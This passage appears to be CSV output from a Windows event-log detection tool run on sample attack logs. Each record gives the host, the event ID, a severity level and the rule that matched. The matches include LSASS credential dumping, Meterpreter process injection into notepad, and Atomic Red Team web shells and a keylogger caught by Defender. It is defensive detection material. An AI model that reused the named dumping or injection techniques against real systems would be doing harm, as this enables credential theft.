+09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 
+09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From 
Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | 
Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread 
Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 
+2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: 
MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: 
C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to 
